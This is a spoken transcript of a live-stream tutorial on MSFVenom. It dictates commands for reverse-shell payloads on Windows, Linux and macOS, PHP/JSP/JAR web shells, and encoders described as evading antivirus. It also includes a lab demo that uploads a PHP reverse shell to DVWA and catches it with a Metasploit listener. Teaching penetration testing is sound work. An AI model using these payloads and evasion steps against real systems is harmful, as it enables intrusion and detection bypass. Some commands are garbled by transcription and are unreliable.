Hello everyone, welcome to the stream. How are you all? So, I am super excited to have you all here today as we dive into the world of MSFVenom. Whether you are a cybersecurity pro or just starting out, this awesome tool is a game changer when it comes to penetration testing and exploitation. So today we will explore what MSF Venom is and how to use it effectively. And also I will even show you some examples as well. Like I will create some of the payloads using MSF Venom. So if you ever wanted to understand payloads, encoders, and how to generate shell codes, you are in the right place. But before we get started, I want to hear from you. Drop a comment and let me know where you are tuning in from, or if you are ever used MSFNM before, feel free to ask questions throughout the stream. And this is all about sharing knowledge and learning together. So drop some comments. Let's everyone join the stream so I can begin the MSF Venom tool and share you some insights related to MSF Venom or Metasploit framework. So tell me first if you ever used MSF or Metasploit framework. So drop some comments, guys. If you ever used MSF for some kind of exploitation or your penetration testing or network testing or for exploiting the server side, do let me know in comments so I can see you. And if you have any questions, so I want to hear from you. So drop some comments. So first tell me what basically MSF Venom is, or what basically MSF or Metasploit framework is. Then we will start our stream. As I'm seeing right now, some people has joined and some of are still in the process of joining this stream. Also, if you like it, then you can watch my different videos that are available on this channel. So that's basically an initiative to start or to share the knowledge with all of you. So all right, let's jump in and unleash the power of MSF Venom. So first we have to learn about what basically Metasploit framework is. So Metasploit framework is one of the most widely used penetration testing tools. It is very powerful all-in-one tool for performing different steps of a penetration test, right? If you ever tried to exploit some vulnerable systems, chances are that you have used Metasploit or at least are familiar with the name. It basically allows you to find information about system vulnerabilities or use existing exploits to penetrate the system, and also helps create your own exploits and much more. So this is the power of Metasploit framework. So in today's session, I'm going to talk about one of the Metasploit framework's component, which is MSFNO. So in Metasploit framework, there are four components available. Each component do separate tasks. The four components we have is MSF console, which you use to interact with the Metasploit framework. Then MSFDB, basically MSF database, and then MSF Venom, and the last component we have is Meterpreter. So Metasploit framework has these four components: MSF console, MSF DB, MSF Venom, and then we have Meterpreter. So tell me in the comment, guys, if you know all of them, or have you used any one of them to perform your penetration testing. If you look for the installed path in your Kali Linux, so this is your path. The Metasploit framework is installed in user share Metasploit framework. You can switch into the directories using Kali Linux, and you can see on my screen that all the directories are created. So this framework is already pre-installed in your system. As you see, we have multiple module available, we have multiple components available. MSF console is there, MSF DB is there, MSFVenom is also available, some script exploits, scripts, tools, vendors, and database, also some modules. So in all those modules, if I switch to modules, you will see these are the modules we have. 7 modules we have in Metasploit framework, named auxiliary, encoders, evasion, exploits, nops, payload, or post. Each these modules do separate tasks. So in today's team, I will covering the basics of or how you can write your own exploits using MSFVenom in detail, and show you some examples also. So if you are using other Linux distribution like Ubuntu or Red Hat or any other Linux distro, then you can simply install Metasploit with the simple command. So I'm clearing my terminal and showing you the command of installing a Metasploit framework in other Linux distros. So to install Metasploit in Linux, uh, you have to get the package. The package name is Metasploit-framework. And on Debian and Ubuntu based Linux distros, you can use the apt package manager to install the Metasploit framework. So the command will be, if you want to install in any other distro. In Kali Linux, it is already pre-installed, so the command will be Metasploit-framework. If you hit enter, this framework is installed in your system. And suppose you are using the CentOS or Red Hat distribution in your system, so you can use yum to install this. So yum install, then Metasploit hyphen framework. So that's how you can install this awesome framework in your system, right? So let's first talk about all of these component, like why we use Metasploit framework. Can anyone tell me why we use Metasploit framework? Why we use Metasploit framework? So I'm reading your comments. So hello Abhishek, hello Bhanu, hello Monica, hello Hero. Why we use Metasploit framework? Anyone? Okay, so let me first tell you. So Metasploit framework, suppose at the very beginning of any penetration testing, if information gathering is done, the more information you can gather about your target, the better it will be for you to know the target system and use the information later in the process, right? So information may include crucial information like open ports, running services, or general information such as the domain name registration information. Various techniques and tools are used to gathering information about the target, such as Nmap, Whois, NSLOOKUP, Dig, Maltego. These are the common information gathering tools we have. Then we perform vulnerability analysis. Like in this step, the potential vulnerabilities of the target are analyzed for further actions, right? Some vulnerabilities may give you the entire access to the system once exploited, with while some may only give you some normal information about the system. Then we perform the exploitation part. And in this exploitation part, Metasploit framework plays very crucial role, right? So if we talk about all the components we have in Metasploit framework, so Metasploit framework is open source and it is written in Ruby. So it is an extensible framework also. You can build custom features of your likings using Ruby. So if you familiar with the Ruby language, you can build some custom features. We can also add different plugins also in the MSF. So all these four component we have, like if I switch to the directory again and show you the component. So MSF console is the first component we have. And this component is the command line interface. This component is the command line interface. We can use that interface to basically navigate through all the Metasploit database at very ease and use the required modules. So all the modules you have, you can easily used via MSF console. So this is the command that you entered before to get the Metasploit console. So if you want to start up or open the console, so you can type the command Metasploit console in your terminal, and it will take some time to open, and then your command line interface will be opened. Here you can see we have around 2397 exploits and 1235 auxiliaries, 422 posts, 1391 payloads, 46 encoders, 11 knobs, and 9 evasions. So Meta MSF console basically is the command line interface. We can navigate, we can via using MSF console, we can navigate all the Metasploit database and use these all required modules. So MSF console is basically used to attack on the system and to maintain or to launch the attack. Then the second component we have is MSFDB. So what MSFDBs basically do, managing all the data. You can manage all the data via MSFDB. So in Metasploit framework basically gives you the option to use PostgreSQL database to store and access your data quickly and efficiently, right? So if you want to store some of your result or organize your scan results in the database to access them later, you can use MSFDB. Then we have our tool named MSFVenom. So this MSFVenom helps you to create your own payloads, right? Your payloads that you want to inject in your victim's machine. So with the help of MSFVenom, you can create your own custom payloads. This is important since your payload might get detected as a threat on the victim machine and get detected also by the threat detection software or any antivirus or any anti-malware softwares, right? So this happens because the threat detection systems already has stored fingerprints of many malicious payloads. So there are some ways you can evade detection. So we will create some evade payload, custom payloads using MSFVenom also. The fourth component we have is Meterpreter. So Meterpreter is not directly accessible. It is an advanced payload that has a lot of functionalities built into it, and it will also communicate using encrypted packets. So Meterpreter is opened when you attack on the system using MSF console or use some of the modules. So Meterpreter is quite difficult to trace and locate once in the system. It can capture screenshots, dump password hashes, and many more. So in today's Steam, we are basically talk about the MSFVenom, not any other component. So what MSFVenom is basically, if we talk about MSFVenom, the core functionality of MSFvenom is that you can create your own custom payloads. Right? So MSFvenom is a versatile payload generator, and we can generate some of the payloads within the Metasploit framework. It is very crucial step for crafting malicious payloads in your penetration testing or red teaming exercises. Right? It combines the capabilities of MSF payload and MSF encode also into one streamlined tool, allowing security professionals to create custom payloads compatible with various target platforms, including Windows, Linux, Android, and more. And using MSFvenom, attackers can also generate payloads that can exploit vulnerabilities, elevate privileges, or established command and control channels, mimicking real world attack scenarios, right? So its compatibility with Metasploit's exploit module makes it a powerful tool for attacks according to some specific threat, right? So let's first generate some basic meter payload using MSFvenom for 32-bit Windows. So what am I doing? I'm writing the command here, and then using MSFvenom, I will create it, right? So first let's write the command for basic meter payload, right? Basic meter payload for 32-bit Windows. Using this payload, you can generate a reverse TCP connection, and once it got executed on the target system, it initiate a reverse connection to the attacker's machine. So what command you can use, or how you can create your custom payload? You can use MSFvenom in your command terminal. Type MSFvenom space -p for providing the payload. And our what payload I'm using Windows slash meter slash reverse underscore TCP. This is our payload. Then you have to provide your localhost address, your own system's IP. So your IP, put your IP here. You can put your IP here. Then we have to define our local port. So you can define your local port or port number. Then I want to define, or I want to create this payload in an executable file. So you can use option -f, then define the executable file, which is exe, then store this into a file. So you can name the file, or you can name the exploit, which is you can name it any name you can take. So I'm going to take shell.exe. So this is the command you can use to create a basic meter payload using MSFvenom. So let's create the payload first. So I'm going to use Windows slash meter, then reverse underscore TCP. Then I have to provide the lhost. So right now I'm not providing my original localhost address, so I'm going to put a dummy address. Suppose I have this address in the system, then lport, a port number, then -f executable file, and let's store this with a shell.exe. When you hit enter, a exploit will be created and it is stored into your system. Let's check it out. So I think shell.exe is created, right? So you can use this payload, you can use this executable file to onto the target machine, and once it got executed, you will receive a reverse connection to the MS attacker's machine. And to listen the connection, what you can use the uh, multi-handler exploit using MSF console. Suppose you want to generate a PowerShell reverse shell, not the meter pitter reverse shell, basically a PowerShell reverse shell. So what command you can use? But first, tell me if you are able to understand this, like how this command basically works, or how it will be created. Drop some comments. So I got to know that you are watching and listening my voice or interested in this stream. Okay, so let's create a PowerShell reverse shell. MSFVenom, then space -a. I'm going to select the architecture of the system, which is x86. Then what platform I need to create. So platform space Windows, then -p, providing the payload. So the payload will be Windows slash PowerShell underscore reverse underscore TCP. Then provide your localhost address, which is lhost, and then IP of your system. Then define your local port. Then you can use -e because I want to execute on somewhere. So cmd slash, or encode basically. So cmd slash PowerShell underscore base 64. Using this encoder, I'm going to encode my payload. Then -i space 3, then -f. I want to see the raw data, and then storing them into a file. So shell1.txt or PowerShell dot. So I'm going to save it as a PowerShell .ps1 because I want to execute as a PowerShell reverse shell. So instead of saving the file in executable ones, I'm going to save it as a .ps1. So this payload basically utilize the PowerShell to establish a reverse connection or reverse shell encoded to bypass the basic security filters. That's why we use encoding techniques also, and making this payload as an option for post exploitation on Windows target. So if you are looking for a payload that basically bypass some security filters, so you can use the PowerShell functionality to establish a reverse connection. Got it? So hello Black Diamond, thank you for your support. Keep watching. In this stream, I'm going to tell you all the commands for creating different payloads. So hopefully it will help you in your penetration testing or red teaming exercises, right? So now let's create a payload for 64-bit meter pitter payload. 64-bit meter pitter payload, and you can use the command will be MSFVenom space -p, and then use the payload Windows slash x64 slash meter pitter slash reverse connection. So I'm going to use it reverse underscore TCP. Then I'll host your IP address, your own IP address, not the victim one. Then I'll port, use some of your port. So define your port number, then -f exe and store this into a executable file exe. So this is the 64-bit meter pitter payload. So a 64-bit version of the meter pitter payload. Earlier we created a 32-bit version of meter pitter payload. It is used when the target using the modern Windows operating system and to ensure compatibility or control over the victim machine. So in modern Windows operating system, where 32-bit version is not available, you can create a 64-bit meter pitter payload and then launch this attack or execute that file on the victim machine, and this will initiate a reverse connection from the victim machine to the attacker's machine. You can listen the connection using MSF console's exploit. Then there is one more payload we have. It is named as Windows message box shellcode. So this payload is basically used Windows message box. Windows message box shellcode. So this payload is commonly used to test the shellcode execution. It will generate shellcode that displayed a message box on the Windows system, providing a visual confirmation that the code is executed. So if you want to generate some messages on the victim machine on the Windows system, then you can use this payload. So the command will be MSFVenom space -p for defining your payload, which is Windows slash message box. Then define your message, which is whatever you want to define. So suppose I defined test here, then the title. So I'm defining demo. Then -f space C, and then you can save it into any file. So here -p is the payload creates a window message box that displays hello with the with the uh, test with the title demo. And this type of shellcode is basically used to ensure the shellcode execution mechanism is working, right? And the option -fc output the shellcode in C format, which can be compiled and injected into the vulnerable process of testing. Suppose you want to write a shell for Linux system, so a 64-bit Linux reverse shell. So the command will be MSFVenom space -p space Linux slash x64, then slash meter pitter slash reverse underscore TCP, then lhost, provide your localhost IP, then lport, define your port number, then -f, then elf, and save it the file with the name of shell.elf. So this payload generates a reverse TCP shell for 64-bit Linux system, and once deployed on a target, if you deployed this on a target, so it connects back to you with the attacker system and offering command execution capabilities. So whenever you have a Linux machine to test on, you can use this payload to test. Suppose if you want to write a 32-bit payload for Linux system, so 32-bit reverse shell. So what you can do, you can use MSFVenom. So I'm going to copying it, and let's first change the payload. So the payload will be OSX slash x86 shell underscore reverse underscore TCP. Then your localhost IP, then your local port, then -f, and use this extension. So that will be the payload. Okay, no, ELF. Marco is used for MacBook. ELF. So this is the payload for 32-bit variant of Linux, and it is very old target and lightweight Linux distributions. So normally the modern Linux systems are working on 64-bit architecture. So, but if you have a lightweight Linux distribution, then you can use this 32-bit payload. So someone is asking where we can read about the encryption algorithms. Uh, which type of encryption algorithm you are asking about? The cryptography ones, or that are used in the Metasploit framework? So let's moving on. So if you want to create a payload for Mac OS, right? If you have a Mac OS and if you want to test a Mac OS, then you can create a reverse shell payload using MSFVenom. So the command will be MSFVenom space -p, then OSX slash x86 slash shell underscore reverse TCP. Then localhost space your IP, then lport space your port number, then -f space Marco space shell dot Marco. This is used to create a reverse TCP shell for Mac OS using the Marco format and produce a match Marco file to establish a reverse shell on MacBook OS. Suppose if you want to create a PHP web shell, then what will be the option and what will be the command? So MSFvenom -p, then PHP slash meterpreter slash reverse underscore TCP, then lhost followed by your IP, then L port, followed by your port, then -f row space shell dot php, right? This is the PHP web shell. So someone is asking in the chat that एक reverse shell upload करके explain करिए. So yes, Harshit, I will use a dummy environment to upload a shell and show you how a reverse connection will be created. So let's see the example. So first we have to open our lab. So I'm using the lab with DVWA. This is a web environment and I'm going to use the file upload functionality to upload the reverse shell, and then we'll initiate the connection, right? So let's check it out how we can upload a shell onto the machine using a file upload functionality. So first we need to create a shell. We need to uh, create a shell, then we will upload it and try to receive a reverse connection. So first we need to create a shell. So let's create a shell first using MSFVenom. So because this application is, I'm going to use a PHP based shell. So let's use this command for initiating a shell. So we need to first check our IP. So this is my IP 159.132. So I'm copying my IP because we need that IP to create a reverse shell. So let's create it using MSF venom space hyphen p, then php slash meter slash reverse underscore tcp. Now once you created a shell, then you have to receive a connection. So to receive a connection, we need to uh, run a listener, right? So let's first create the connection and then we will open the listener. So I'm going to use lhost space my IP, which is 192.168.159.132. Then L port. So I'm going to use a random port number like 4448. Then using the row code and saving the row code into a file. So I'm saving with the name of live shell testing dot php. So a payload will be created, and PHP payload using a PHP backdoor payload created using MSFVenom. So if you want to check the payload, so this payload is created. Now let's upload it onto our application. So I think it will be available somewhere. So I'm going to upload it. So it will be uploaded successfully because no restrictions are there. So now this is my uploaded path where the shell is uploaded, but I need to make a connection. So first we need to start the listener, and to start the listener I need MSF console, because MSF console is the command line where we can start our listener, right? Tell me if you are getting till now the steps or the concept how we are uh, uploading this reverse shell onto the application. So MSF console is open. Now what we can do, we can run our listener, which is exploit slash multi slash handler, right? Set payload space php slash meter pitter slash reverse underscore tcp. Provide your localhost. So my localhost is 192.168.159.132, I think. Let me recheck. Yes, it is right. Setting the L port. So the port number I used, okay, I don't remember the port number. I think I used 4446 or 48. The port number is 444448. Now let's run the exploit. So my listener is on. I'm going to visit the uploaded shell, and once the shell is visited, I got the connection and meter pitter will be opened. Now you can run your commands. So as I run sysinfo, I will get the system info. Right. So this is the shell I used here is on the application, right? So the application is built in PHP. That's why I used a PHP payload. But what if you want to exploit this on Windows, on Linux, or any other operating system like Mac OS? So you need to create or you need to learn about the different payload creation techniques, like what techniques I showed you to generate a 32-bit payload, or 64-bit payload for MSF Mac OS payload. So different custom payloads you can create using MSFvenom. Suppose you want to generate a JSP shell, not PHP, but if you want to generate a JSP shell, if you want to generate a ZAR shell in ZAR format, basically. So you need to understand different things. You need, if you want to create some HTTP payloads with encoding techniques. So different techniques we have according to the application, or according to the machine we have to test on. So whatever payload you are using, you can always use MSF console to receive that connection. But you need to use the payload very carefully, because I uploaded the PHP shell. That's why I set the payload here as a PHP. But if you use any different payload to create in MSFvenom, then you should use that exact payload here also, right? To generate the listener or to open the listener. So let's write the command for a JSP web shell. These are used for in web applications. So the command will be MSFVenom space -p, then Java slash JSP underscore shell underscore reverse underscore TCP, then followed by your localhost IP, followed by your local port, the port number, then -f row, and save this with the shell.jsp. So this reverse shell is used for Java environments, basically targeting the web applications that are running on JSP, Java Server Pages. So whenever you identified some of the in some of the application that are using JSP servers, so you can use this web shell to upload it on the server and then try to receive or to make a reverse connection or to get the shell. Suppose you want to create a another jar based shell, so jar web shell. So the command will be I'm going to modify in this command. So Java meter slash reverse underscore TCP, then shell dot jar, and here you can use W. This is the command for a jar web shell. Suppose you want to create a HTTPS meter payload with encoding techniques also. So HTTPS, the websites that are using HTTPS for communication makes it harder for network security solutions to detect the payload. So adding encoding basically allows you to bypass antivirus solutions by obfuscating the payload. So in that case, you can use some payloads like this. So HTTPS meter payload. So MSFVenom space -p, then Windows slash meter slash reverse underscore HTTPS, followed by localhost, your IP, then local port, your port number, followed by executable file, and store this as a executable format. If you want to create a encrypted payload, and the encryption will be RC4. So what your command should be MSFVenom space -p, then Windows slash meter slash reverse underscore TCP underscore RC4 space lhost space your IP, then lport space your port, then RC4 password. Then the password, you want to define any password, so you can define any password here. Then -f executable, and save this payload in the shell.executable. So RC4 encryption basically provides secure communication between the payload and the handler, making it more resilient to security detection mechanism. So you are enjoying it, understanding what am I saying, how you can use effectively, how you can use MSFNM more effectively using different payload tactics. Drop some comment, guys. So I got to know that you are watching and listening and interested. We have different payloads, like for Shikata, for Android, custom shell codes, different encoding techniques like XOR encoding. Hello, Geek Strong. So moving on, let's create a payload for Shikata 9. This payload is very useful to avoid detection by antivirus software because the payload will be encoded, right? So the payload name is Shikata -GA -9 encoding, and the payload will be MSFVenom -P, then Windows slash meter peter slash reverse underscore TCP, then -E because I want to use encoding techniques, then x86 slash Shikata -GA -9 space -I3 space -F executable, and you can save it as encoded payload or encoded shell.exe. So why I use -I? Because it will iterating the encoding process 3 times, so making it harder for any antivirus software to detect. That's why we, whenever we want to use any encoding technique into our payload creation using MSFNM, we use Shikata to encode our payload. Because in the Metasploit framework, what encoder module will do, encoder module will encode your payload, and they are self-destructing. So once got executed on the system, it will automatically decrypt it. You don't need to decrypt again. It will automatically decrypt it and got executed into the system. So using those encoding techniques, uh, we mostly use those to bypass the antivirus, or to avoid detection by any firewall. So Shikata is the common encoder we use. Then if you want to encode some more scripts or encode some more payloads, you can check with the encoding options or the encoders that are available here. So if I go to the directory and go to the modules, let's check all the encoders. So I'm going to visit the directory, and these are all the encoders, like for PHP, for Ruby, for x64, for x86. So let's use the x86 one. So you can see these are the encoders we have. XOR encode, the ZMP call, countdown, polyglot payloads or polyglot encoders are also available. Shikata guy. This is the encoders I'm talking about. You can use Unicode encoders, you can use uh, non-alpha, you can use non-upper service encoders. So different encoders we have for different types of payload. For CMD, for generic, PHP, Ruby, x64, x86. So now let's create a payload. So we are going to use SSL to encrypt it. So what we are basically doing now, we will create a SSL based payload and we use SSL to encrypt. So we will generate a reverse HTTPS meter peter payload for Windows. The payload will be encoded in hex format and returned to a file. Additionally, we will use some functionality to track the payload by assigning a UUID and SSL to encrypt the communication with the handler, right? So this is helpful to bypass or to encode something or to encrypt. So what the command should be? So the command will be MSFVenom space -p, then Windows slash x64 slash meter peter underscore reverse underscore https space lhost your IP, lport the port number, then payload UUID tracking equals to true space handler, because I want to use SSL to encrypt it. That's why I use SSL cert equals to SSL dot PAM. A PAM certificate will be used. Then payload UUID name. You can provide any name. So I'm going to use it like Rohan space -x, sorry, -f space hex -o, and saving the output in shell code dot txt, or you can use shellcode underscore hex dot txt. So in this command, P is used for creating or using the payload. The lhost is your IP address, the lport is your port number. The payload UUID tracking enables tracking the payload via the UUID, and handler SSL cert. This is uses a SSL certificate for secure communication. Then payload UUID name, assign the name to the payload for tracking, and -f hex basically specifies the output format as a hexadecimal string, and -o write the shellcode in this file. So you are understanding it, what am I saying? So if you want to use hex encoding, then this will be your command. You can use MSFVenom space hyphen p, then windows slash meter pitter slash reverse underscore TCP space lhost, then your IP, lport, your port number, then and use the encoding technique is generic slash none, then hyphen x or hex. Save this in any file and the payload will be created. So hyphen e flag here, I used hyphen e flag option switch is specifies the encoder, means no specific encoding other than hex. That's why I used generic none. So if you execute this, so once you generated the hex encoded payload, you need to decode and execute it. Simple method for executing hex payload involves basically converting the hex into binary and then executing it via memory injection in languages like C or Python. So you can use Python to execute it. So there are different encoding techniques we have, as I already showed you in the uh, encoder module. You can create payloads for image files also, right? If you want to create a image files payload, then it will be created using MSFVenom. So Metasploit also offers the ability to use your payloads within the PNG files, image files, and this technique known as steganography can be particularly useful for evading detection and social engineering attacks. So how can you create a image file using Meterpiter? So there is the option or the command. So payloads for PNG files or PNG shellcode with MSFVenom. Very useful where you are about to, or in your application only images are allowed, then you can still test it with shell execution using these payloads. So MSFVenom space hyphen p, then windows slash meter slash reverse underscore TCP lhost space, sorry, lhost equals to IP, then lport equals to the port number, then hyphen f row, and then save it in PNG file. So either you first create a payload and then use some encoding technique to particularly create a image PNG file. So now these are all the commands we have. These are all the payloads we have for MSFVenom. So tell me in the comments if you are enjoying this and if you want me to continue uh, all these sessions related to Metasploit. If you want to know more about the Metasploit framework, how can we use it, the other components of MSF more efficiently. So if you want me to go live again with some topics, so you can suggest me some topics, guys. We can create a live stream for those topics also. I'm open to take your suggestions. So tell me in the comments if you enjoy the session, if you have some queries, if you are not able to understand anything. Anything you can share with me. Okay, so all right, everyone, that bring us to the end of today's stream of MSF Venom. I hope you found it informative and engaging. So we covered a lot of ground from the basics to some advanced techniques, and I appreciate your participation and your continuously uh, queries on the chat. So if you enjoyed the stream, please give it a thumbs up and consider subscribing for more content like this. Your support really helps the channel to grow and allow me to bring you more depth tutorials and live sessions. Don't forget to check the description for any resources I mentioned, and including links of documentation. You can check my another videos. And as always, if you have more questions or topics you would like me to cover in future streams, drop in the comments below. So I'll basically love hearing from all of you. So feel free to join my community on Telegram. The link will be available in the description. And thanks again for tuning in. Stay curious, keep experimenting, and I will see you in next stream. Until then, take care and happy hacking. Goodbye, everyone.